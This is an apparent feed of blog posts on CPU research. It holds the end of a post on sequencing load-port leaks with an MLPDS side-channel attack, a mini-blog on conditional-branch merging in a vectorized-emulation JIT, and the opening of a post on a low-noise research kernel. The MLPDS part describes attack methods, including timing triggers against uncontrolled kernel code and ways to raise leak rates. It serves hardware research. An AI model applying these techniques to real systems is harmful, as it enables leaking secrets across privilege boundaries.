</code></pre></div></div>
<p>Oh! How cool is that!? In the loads we’re leaking we see the raw page table
entries with various versions of the accessed and dirty bits set! Here are the
loads which stand out to me:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Leaked values:
0x000000002cc8c000 : 3796
0x000000002cc8c027 : 225
0x000000002cc8d000 : 112
0x000000002cc8d027 : 57
0x000000002cc8e000 : 1
0x000000002cc8e027 : 35
Actual page table entries for the page we're accessing:
CR3 0x630000
PML4E 0x2cc8e007
PDPE 0x2cc8d007
PDE 0x2cc8c007
PTE 0x13370003
</code></pre></div></div>
<p>The entries are being observed as <code class="language-plaintext highlighter-rouge">0x...27</code> as the <code class="language-plaintext highlighter-rouge">0x20</code> bit is the accessed
bit for page table entries.</p>
<p>Other notable entries are <code class="language-plaintext highlighter-rouge">0x0000930000000000</code> and <code class="language-plaintext highlighter-rouge">0x00209b0000000000</code> which
look like the GDT entries for the code and data segments. <code class="language-plaintext highlighter-rouge">0x0000700dfeed0000</code>
and <code class="language-plaintext highlighter-rouge">0x0000700dfeed0008</code> which are the 2 virtual addresses I’m accessing the
un-accessed memory from. Who knows about the rest of the values? Probably some
stack addresses in there…</p>
<p>So clearly as we expected, the processor is dispatching uops which are
performing a page table walk. Sadly we have no idea what the order of this walk
is, maybe we can find a creative technique for sequencing these loads…</p>
<hr />
<h1 id="sequencing-the-loads">Sequencing the Loads</h1>
<p>Sequencing the loads that we are leaking with MLPDS is going to be critical to
getting meaningful information. Without knowing the ordering of the loads we
simply know contents of loads. Which is a pretty awesome amount of information,
I’m definitely not complaining… but come on, it’s not perfect!</p>
<p>But perhaps we can limit the timing of our attack to a specific window, and
infer ordering based on that. If we can find some trigger point where we can
synchronize time between the attacker thread and the thread with secrets, we
could change the delay between this synchronization and the leak attempt. By
scanning this leak we should hopefully get to see a cycle-by-cycle view of
observed values.</p>
<h4 id="a-trigger-point">A trigger point</h4>
<p>We can perform an MLPDS attack on a delay, however we need a reference point to
delay from. I’ll steal the oscilloscope terminology of a trigger, or a
reference location to synchronize with. Similar to an oscilloscope this trigger
will synchronize our on the time domain each time we attempt.</p>
<p>The easiest trigger we can use works only in an environment where we control
both the leaking and secret threads, but in our case we have that control.</p>
<p>What we can do is simply have semaphores at each stage of the leak. We’ll have
2 hardware threads running with the following logic:</p>
<ol>
<li>(Thread A running) (Thread B paused)</li>
<li>(Thread A) Prepare to do a CPU attack, request thread B execute code</li>
<li>(Thread A) Delay for a fixed amount of cycles with a spin loop</li>
<li>(Thread B) Execute sample code</li>
<li>(Thread A) At some “random” point during Thread B executing sample code,
perform MLPDS attack to leak a value</li>
<li>(Thread B) Complete sample code execution, wait for thread A to request
another execution</li>
<li>(Thread A) Log the observed value and the number of cycles in the delay loop</li>
<li>goto 0 and do this many times until significant data is collected</li>
</ol>
<h4 id="uncontrolled-target-code">Uncontrolled target code</h4>
<p>If needed a trigger could be set on a “known value” at some point during
execution if target code is not controllable. For example, if you’re attacking a
kernel, you could identify a magic value or known user pointer which gets
accessed close to the code under test. An MLPDS attack can be performed until
this magic value is seen, then a delay can start, and another attack can be
used to leak a value. This allows an uncontrolled target code to be sampled in
a similar way. If the trigger “misses” it’s fine, just try again in another
loop.</p>
<h4 id="did-it-work">Did it work?</h4>
<p>So we put all of these things together, but does it actually work? Lets try
our 2 load example, and we’ll make sure they depend on each other to ensure
they don’t get re-ordered by the processor.</p>
<p>Prep code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">write_volatile</span><span class="p">(</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u64</span><span class="p">,</span> <span class="mi">0x12341337cafefeed</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">write_volatile</span><span class="p">((</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u64</span><span class="p">)</span><span class="nf">.offset</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span> <span class="mi">0x1337133713371337</span><span class="p">);</span>
</code></pre></div></div>
<p>Test code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">ptr</span> <span class="o">=</span> <span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">read_volatile</span><span class="p">(</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">read_volatile</span><span class="p">((</span><span class="n">vaddr</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">&</span> <span class="mi">0x8</span><span class="p">))</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">);</span>
</code></pre></div></div>
<p>In this code we set up 2 dependant loads. One which reads a value, and then
another which masks the value to get the 8th bit, which is used as an offset to
a subsequent access. Since the values are constants, we know that the second
access will always access at offset 8, thus we expect to see a load of
<code class="language-plaintext highlighter-rouge">0x1234...</code> followed by <code class="language-plaintext highlighter-rouge">0x1337...</code>.</p>
<h4 id="graphing-the-data">Graphing the data</h4>
<p>To graph the data we have collected, we want to collect the frequencies each
value was seen for every cycle offset. We’ll plot these with an x axis in
cycles, and a y axis in frequency the value was observed at that cycle count.
Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s
check it out in our simple case test code!</p>
<p><img src="/assets/leak_seq_example.png" alt="Sequenced leak example data" />
<em><sub>Sequenced leak example data</sub></em></p>
<p>Here we also introduce a normal distribution best-fit for each value type, and
a vertical line through the mean frequency-weighted value.</p>
<p>And look at that! We see the first access (in light blue) indicating that the
value <code class="language-plaintext highlighter-rouge">0x12341337cafefeed</code> was read, and slightly after we see (in orange) the
value <code class="language-plaintext highlighter-rouge">0x1337133713371337</code> was read! Exactly what we would have expected. How
cool is that!? There’s some other noise on here from the testing harness, but
they’re pretty easy to ignore in this case.</p>
<hr />
<h1 id="a-real-data-case">A real-data case</h1>
<p>Let’s put it all together and take a look at what a load looks like on pages
which have not yet been marked as accessed.</p>
<p><img src="/assets/loadseq_example.png" alt="Load sequence example" /></p>
<p><em><sub>Frequencies of observed values over time from load ports. Here we’re
seeing the processor internally performing a microcode-assisted page table walk
to update accessed and dirty bits. Only one load was performed by the user,
these are all “invisible” loads done behind the scenes</sub></em></p>
<p>Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only
look at the page table entry values and the value contained on the page we’re
accessing.</p>
<p>Here are the page table entries for the memory we’re accessing in our example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CR3 0x630000
PML4E 0x2cc7c007
PDPE 0x2cc7b007
PDE 0x2cc7a007
PTE 0x13370003
Data 0x12341337cafefeed
</code></pre></div></div>
<p>We’re going to reset all page table entries to their non-dirty, non-accessed
states, invalidate the TLB for the page via <code class="language-plaintext highlighter-rouge">invlpg</code>, and then read from the
memory once. This will cause all accessed bits to be updated in the page
tables! Here’s what we get…</p>
<p><img src="/assets/annotated_ucode_page_walk.png" alt="Annotated ucode page walk" />
<em><sub>Annotated ucode-assist page walk as observed with this technique</sub></em></p>
<p>Here it’s hard to say why we see the 3rd and 4th levels of the page table get
hit, as well as the page contents, prior to the accessed bit updates. Perhaps
the processor tries the access first, and when it realizes the accessed bits
are not set it goes through and sets them all. We can see fairly clearly that
after this page data is read ~300 cycles in, that it performs a page-by-page
walk through each level. Presumably this is where the processor is reading the
original values from pages, <code class="language-plaintext highlighter-rouge">or</code>ing in the accessed bit, and moving to the next
level!</p>
<hr />
<h1 id="speeding-it-up">Speeding it up</h1>
<p>So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second.
This is a decent data rate, but when we’re wanting to sample data and draw
statistical significance, more is always better. For each different value we
want to log, and for each cycle count, we likely want about ~100 points of
data. So lets assume we want to sample 10 values over a 1000 cycle range, and
we’ll likely want 1 million data points. This means we’ll need about 2 minutes
worth of runtime to collect this data.</p>
<p>Luckily, there’s a relatively simple technique we can use to speed up the data
rates. Instead of using the full arbitrary 64-bit leak for the whole test, we
can use the arbitrary leak early on to determine the values of interest. We
just want to use the arbitrary leak for long enough to determine the values
which we know are accessed during our test case.</p>
<p>Once we know the values we actually want to leak, we can switch to using our
known-value leak which allows for about 6 million leaks per second. Since this
can only look for one value at a time, we’ll also have to cycle through the
values in our “known value” list, but the speedup is still worth it until the
known value list gets incredibly large.</p>
<p>With this technique, collecting the 1 million data points for something with
5-6 values to sample only takes about a second. A speedup of two orders of
magnitude! This is the technique that I’m currently using, although I have a
fallback to arbitrary value mode if needed for some future use.</p>
<hr />
<h1 id="conclusion">Conclusion</h1>
<p>We introduced an interesting technique for monitoring Intel load port traffic
cycle-by-cycle and demonstrated that it can be used to get meaningful data to
learn how Intel micro-architecture works. While there is much more for us to
poke around in, this was a simple example to show this technique!</p>
<h1 id="future">Future</h1>
<p>There is so much more I want to do with this work. First of all, this will just
be polished in my toolbox and used for future CPU research. It’ll just be a
good go-to tool for when I need a little bit more introspection. But, I’m sure
as time goes on I’ll come up with new interesting things to monitor. Getting
logging of store-port activity would be useful such that we could see the other
side of memory transactions.</p>
<p>As with anything I do, performance is always an opportunity for improvement.
Getting a higher-fidelity MLPDS exploit, potentially with higher throughput,
would always help make collecting data easier. I’ve also got some fun ideas for
filtering this data to remove “deterministic noise”. Since we’re attacking from
a sibling hyperthread I suspect we’d see some deterministic sliding and
interleaving of core usage. If I could isolate these down and remove the noise
that’d help a lot.</p>
<p>I hope you enjoyed this blog! See you next time!</p>
<hr />Miniblog: How conditional branches work in Vectorized Emulation2019-10-07T07:11:15+00:002019-10-07T07:11:15+00:00https://gamozolabs.github.io/fuzzing/2019/10/07/vectorized_emulation_condbranch<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!</p>
<p>Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!</p>
<hr />
<h1 id="prereqs">Prereqs</h1>
<p>You should probably read the <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">Introduction to Vectorized Emulation blog</a>!</p>
<p>Or perhaps watch the <a href="https://recon.cx/media-archive/2019/Session.004.Brandon_Falk.Vectorized_Emulation_Putting_it_all_together-kFn8Kr6lsNZQZ.mp4">talk I gave at RECON 2019</a></p>
<h1 id="summary">Summary</h1>
<p>I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.</p>
<p>This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example. What I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emit simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.</p>
<hr />
<h1 id="falkil-example">FalkIL Example</h1>
<p>Here’s an example of what FalkIL looks like:</p>
<p><img src="/assets/falkil_example_graph.png" alt="FalkIL example" /></p>
<hr />
<h1 id="jit">JIT</h1>
<p>Here’s what the JIT for the above IL example looks like:</p>
<p><img src="/assets/falkil_example_jit_graph.png" alt="FalkIL JIT example" /></p>
<p>Ooof… that exploded a bit. Let’s dive in!</p>
<hr />
<h1 id="jit-calling-convention">JIT Calling Convention</h1>
<p>Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.</p>
<h2 id="kmask-registers">Kmask Registers</h2>
<p>Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.</p>
<p>Intel provides us with 8 kmask registers. <code class="language-plaintext highlighter-rouge">k0</code> through <code class="language-plaintext highlighter-rouge">k7</code>. <code class="language-plaintext highlighter-rouge">k0</code> is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.</p>
<h3 id="online-vm-mask">Online VM mask</h3>
<p>Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since <code class="language-plaintext highlighter-rouge">k1</code> is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in <code class="language-plaintext highlighter-rouge">k1</code> (VM is disabled), must not have its state modified. Thus you’ll see <code class="language-plaintext highlighter-rouge">k1</code> is used as a merging mask for almost every single vectorized operation we do.</p>
<p>By using the <code class="language-plaintext highlighter-rouge">k1</code> mask in every instruction, we preseve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.</p>
<p>This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).</p>
<h3 id="following-vm-mask">“Following” VM mask</h3>
<p>At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in <code class="language-plaintext highlighter-rouge">k7</code>. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.</p>
<p>The VM we are “following” must always be active, and thus <code class="language-plaintext highlighter-rouge">(k7 & k1) != 0</code> must always be true! This <code class="language-plaintext highlighter-rouge">k7</code> mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this <code class="language-plaintext highlighter-rouge">k7</code> mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).</p>
<h3 id="kmask-register-summary">Kmask Register Summary</h3>
<p>Here’s the complete state of kmask register allocation during JIT</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>K0 - Hardcoded in hardware to all ones
K1 - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7 - "Following" VM mask
</code></pre></div></div>
<h2 id="zmm-registers">ZMM registers</h2>
<p>The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.</p>
<h3 id="following-vm-index-vector">“Following” VM index vector</h3>
<p>Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of <code class="language-plaintext highlighter-rouge">zmm30</code>. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.</p>
<p>By holding the index (effectively the bit index of the following VM mask) in all lanes of the <code class="language-plaintext highlighter-rouge">zmm30</code> vector, we can perform a single <code class="language-plaintext highlighter-rouge">vpermq</code> instruction to broadcast the following VM’s value to all lanes in a vector.</p>
<p>Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirity of a JIT execution (until a JIT/VM exit).</p>
<h4 id="why-this-is-important">Why this is important</h4>
<p>Lets say:</p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> contains <code class="language-plaintext highlighter-rouge">[10, 11, 12, 13, 14, 15, 16, 17]</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm30</code> contains <code class="language-plaintext highlighter-rouge">[3, 3, 3, 3, 3, 3, 3, 3]</code></p>
<p>The CPU then executes <code class="language-plaintext highlighter-rouge">vpermq zmm0, zmm30, zmm31</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm0</code> now contains <code class="language-plaintext highlighter-rouge">[13, 13, 13, 13, 13, 13, 13, 13]</code>… the 3rd VM’s value in <code class="language-plaintext highlighter-rouge">zmm31</code> broadcast to all lanes of <code class="language-plaintext highlighter-rouge">zmm0</code></p>
<p>Effectively <code class="language-plaintext highlighter-rouge">vpermq</code> uses the indicies in its second operand to select values from the third operand.</p>
<h3 id="desired-target-vector">“Desired target” vector</h3>
<p>We allocate one other ZMM register (<code class="language-plaintext highlighter-rouge">zmm31</code>) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, <code class="language-plaintext highlighter-rouge">zmm31</code> will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(</p>
<h3 id="zmm-register-summary">ZMM Register Summary</h3>
<p>Here’s the complete state of ZMM register allocation during JIT</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Zmm0-Zmm3 - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30 - Index of the VM we are following broadcast to all 8 quadwords
Zmm31 - Branch targets for each VM, indicates where all VMs want to execute
</code></pre></div></div>
<h2 id="general-purpose-registers">General purpose registers</h2>
<p>These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the <a href="https://gamozolabs.github.io/fuzzing/2018/11/19/vectorized_emulation_mmu.html">MMU blog</a>!</p>
<p>When ignoring the MMU, there are only 2 GPRs that we have a special use for…</p>
<h3 id="constant-storage-database">Constant storage database</h3>
<p>On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR <code class="language-plaintext highlighter-rouge">mov</code>, then moving it into the lowest-order lane of a vector <code class="language-plaintext highlighter-rouge">vmovq</code>, and then broadcasting it <code class="language-plaintext highlighter-rouge">vpbroadcastq</code>, is actually a lot more expensive than just loading that value from memory.</p>
<p>To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by <code class="language-plaintext highlighter-rouge">r11</code> during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single <code class="language-plaintext highlighter-rouge">vpbroadcastq zmm, kmask, qword [r11+OFFSET]</code> instruction.</p>
<p>While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.</p>
<h3 id="target-registers">Target registers</h3>
<p>At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by <code class="language-plaintext highlighter-rouge">r12</code>. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.</p>
<h3 id="gpr-summary">GPR summary</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers
</code></pre></div></div>
<hr />
<h1 id="phew">Phew</h1>
<p>Okay, now we know what register states look like when executing in JIT!</p>
<hr />
<h1 id="conditional-branches">Conditional branches</h1>
<p>Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.</p>
<p>Here’s the specific code in question for a conditional branch:</p>
<p><img src="/assets/falkil_condbranch_jit.png" alt="Conditional Branch" /></p>
<p>Well that looks awfully complex… but it’s really not. It’s quite magical!</p>
<h2 id="the-comparison">The comparison</h2>
<p><img src="/assets/cbranch_jit_inst1.png" alt="comparison" /></p>
<p>First, the comparision is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into <code class="language-plaintext highlighter-rouge">k2</code>. This means that <code class="language-plaintext highlighter-rouge">k2</code> will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask <code class="language-plaintext highlighter-rouge">k1</code> here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, <code class="language-plaintext highlighter-rouge">k2</code> has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.</p>
<p>In this case the <code class="language-plaintext highlighter-rouge">0x1</code> immediate to the <code class="language-plaintext highlighter-rouge">vpcmpuq</code> instruction indicates that this is a “less than” comparison.</p>
<h4 id="vpcmpqvpcmpuq-immediate"><code class="language-plaintext highlighter-rouge">vpcmpq/vpcmpuq</code> immediate</h4>
<p>Note that the immediate value provided to <code class="language-plaintext highlighter-rouge">vpcmpq</code> and the unsigned variant <code class="language-plaintext highlighter-rouge">vpcmpuq</code> determines the type of the comparison:</p>
<p><img src="/assets/vpcmpq_imm.png" alt="cmpimm" /></p>
<h2 id="the-comparison-inversion">The comparison inversion</h2>
<p><img src="/assets/cbranch_jit_inst2.png" alt="comparison inversion" /></p>
<p>Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.</p>
<p><code class="language-plaintext highlighter-rouge">kandnw</code> performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have <code class="language-plaintext highlighter-rouge">k2</code> as the second operand (the result of the comparison) this gets negated. This then gets anded with <code class="language-plaintext highlighter-rouge">k1</code> (the third operand) to mask off VMs which are not actively executing. The result is that <code class="language-plaintext highlighter-rouge">k3</code> now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.</p>
<p>In C/C++ this is simply: <code class="language-plaintext highlighter-rouge">k3 = (~k2) & k1</code></p>
<h2 id="the-branch-target-vector">The branch target vector</h2>
<p><img src="/assets/cbranch_jit_inst34.png" alt="branch targets" /></p>
<p>Now we start constructing <code class="language-plaintext highlighter-rouge">zmm0</code>… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by <code class="language-plaintext highlighter-rouge">r11</code>) to load up the target labels. We first load the “true target” labels into <code class="language-plaintext highlighter-rouge">zmm0</code> by using the <code class="language-plaintext highlighter-rouge">k2</code> kmask, the “true” kmask. After this, we merge the “false target” labels into <code class="language-plaintext highlighter-rouge">zmm0</code> using <code class="language-plaintext highlighter-rouge">k3</code>, the “false/inverted” kmask.</p>
<p>After these 2 instructions execute, <code class="language-plaintext highlighter-rouge">zmm0</code> now holds the target “labels” based on their corresponding comparison results. <code class="language-plaintext highlighter-rouge">zmm0</code> now tells us where the currently executing VMs “want to” branch to.</p>
<h2 id="the-merge-into-master">The merge into master</h2>
<p><img src="/assets/cbranch_jit_inst5.png" alt="merge into master" /></p>
<p>Now we merge the target branches for the active VMs which were just computed (<code class="language-plaintext highlighter-rouge">zmm0</code>), into the master target register (<code class="language-plaintext highlighter-rouge">zmm31</code>). Since VMs can be disabled via divergence, <code class="language-plaintext highlighter-rouge">zmm31</code> holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).</p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> now holds the target labels for every single lane with the updated results of this comparison!</p>
<h2 id="broadcasting-the-target">Broadcasting the target</h2>
<p><img src="/assets/cbranch_jit_inst6.png" alt="broadcasting the target" /></p>
<p>Now that we have <code class="language-plaintext highlighter-rouge">zmm31</code> containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, <code class="language-plaintext highlighter-rouge">zmm30</code> contains the index of the VM we are following in all 8 lanes.</p>
<h4 id="example">Example</h4>
<p>Lets say for example we are following VM #4 (zero-indexed).</p>
<p><code class="language-plaintext highlighter-rouge">zmm30</code> contains <code class="language-plaintext highlighter-rouge">[4, 4, 4, 4, 4, 4, 4, 4]</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> contains <code class="language-plaintext highlighter-rouge">[block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]</code></p>
<p>After the <code class="language-plaintext highlighter-rouge">vpermq</code> instruction we now have <code class="language-plaintext highlighter-rouge">zmm1</code> containing <code class="language-plaintext highlighter-rouge">[block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2]</code>.</p>
<p>Effectively, <code class="language-plaintext highlighter-rouge">zmm1</code> will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!</p>
<h2 id="auto-merging">Auto-merging</h2>
<p><img src="/assets/cbranch_jit_inst7.png" alt="auto-merging" /></p>
<p>This is where the magic happens. <code class="language-plaintext highlighter-rouge">zmm31</code> contains where all the VMs “want to execute”, and <code class="language-plaintext highlighter-rouge">zmm1</code> from the above instruction contains where we are actually going to execute. Thus, we compute a new <code class="language-plaintext highlighter-rouge">k1</code> (active VM kmask) based on equality between <code class="language-plaintext highlighter-rouge">zmm31</code> and <code class="language-plaintext highlighter-rouge">zmm1</code>.</p>
<p>Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!</p>
<h2 id="doin-the-branch">Doin’ the branch</h2>
<p><img src="/assets/cbranch_jit_inst8.png" alt="branching" /></p>
<p>Now we’re at the end. <code class="language-plaintext highlighter-rouge">k2</code> still holds the true targets. We and this with <code class="language-plaintext highlighter-rouge">k7</code> (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.</p>
<p>We then need to make this result “actionable” by getting it into the <code class="language-plaintext highlighter-rouge">eflags</code> x86 register such that we can conditionally branch. This is done with a simple <code class="language-plaintext highlighter-rouge">kortestw</code> instruction of <code class="language-plaintext highlighter-rouge">k2</code> with itself. This will cause the zero flag to get set in <code class="language-plaintext highlighter-rouge">eflags</code> if <code class="language-plaintext highlighter-rouge">k2</code> is equal to zero.</p>
<p>Once this is done, we can do a <code class="language-plaintext highlighter-rouge">jnz</code> instruction (same as <code class="language-plaintext highlighter-rouge">jne</code>), causing us to jump to the true target path if the <code class="language-plaintext highlighter-rouge">k2</code> value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).</p>
<hr />
<h1 id="update">Update</h1>
<p>After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.</p>
<p><img src="/assets/cbranch_jit_updated.png" alt="updated JIT" /></p>
<p>Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into <code class="language-plaintext highlighter-rouge">zmm31</code> using the online mask (<code class="language-plaintext highlighter-rouge">k1</code>). This temporarly marks that “all online VMs want to take the false target”. Then, using the <code class="language-plaintext highlighter-rouge">k2</code> mask (true targets), merge over <code class="language-plaintext highlighter-rouge">zmm31</code> with the true target block labels.</p>
<p>Simple! We remove the inverse mask computation <code class="language-plaintext highlighter-rouge">kandnw</code>, and the use of the <code class="language-plaintext highlighter-rouge">zmm0</code> temporary and merge directly into <code class="language-plaintext highlighter-rouge">zmm31</code>. But the effect is exactly the same as the previous version.</p>
<p>Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!</p>
<p>Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a <em>minimum</em> 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are <em>everywhere</em>!</p>
<hr />
<h1 id="fin">Fin</h1>
<p>And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)</p>
<p>It’s important to note that this auto-merging isn’t perfect, and <em>most</em> cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.</p>
<p>I hope this was a fun read! Let me know if you want more of these mini-blogs.</p>
<hr />TwitterSushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection2019-08-19T07:11:15+00:002019-08-19T07:11:15+00:00https://gamozolabs.github.io/metrology/2019/08/19/sushi_roll<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!</p>
<h1 id="summary">Summary</h1>
<p>In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.</p>
<p>We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:</p>
<p><img src="/assets/example_profiling.png" alt="Example uarch activity" />
<em><sub>Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis</sub></em></p>
<h1 id="agenda">Agenda</h1>
<p>This is a relatively long blog and will be split into 4 major sections.</p>
<ul>
<li>The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures</li>
<li>Sushi Roll: The design of the low-noise research kernel</li>
<li>Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors</li>
<li>Results: Putting the pieces together and making graphs of cool micro-architectural behavior</li>
</ul>
<h1 id="why">Why?</h1>
<p>In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.</p>
<p>CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.</p>
